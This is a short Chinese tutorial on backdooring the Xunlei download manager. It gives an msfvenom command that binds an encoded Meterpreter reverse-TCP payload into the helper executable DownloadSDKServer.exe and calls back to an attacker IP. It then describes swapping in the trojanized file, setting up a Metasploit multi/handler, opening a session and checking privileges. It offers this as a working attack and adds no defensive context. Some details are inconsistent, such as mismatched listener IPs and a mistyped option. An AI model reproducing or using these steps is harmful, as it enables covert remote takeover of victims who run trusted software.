1.下载一个正常的软件
我们这里以迅雷为例
安装迅雷,打开软件,启动任务管理器,查看进程。
编辑
如图所示,在迅雷启动的同时,会自动启动一个迅雷下载引擎DodnloadSDKServer.exe *32软件,这时我们就可以在这个软件里面直入后门,也就是给子程序捆绑后门。
注:不要对主软件进行后门植入,以免造成软件不能正常使用。
2.将迅雷的子程序上传到kali系统的根目录下
编辑
3.对子程序注入payload后门程序
命令:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=4444 -b"\x00" -e x86/alpha_upper -i 10 -x DownloadSDKServer.exe -f exe -o /var/www/html/DownloadSDKServer.exe
编辑
如图所示,执行成功。
3.替换原有的子程序
将生成的软件下载下来并复制到文件夹里。
编辑
4.在MSF上启动handler开始监听后门程序
1.kali启动Metasploit软件
编辑
2.使用模块 use exploit/multi/handler,并查看需要配置的参数show options
编辑
3.设置监听主机--kali
set LHOSTS 192.168.1.109
编辑
4.开启run
5.启动迅雷
6.链接成功
编辑
7.查看权限
编辑
其它的就可以自己发挥了。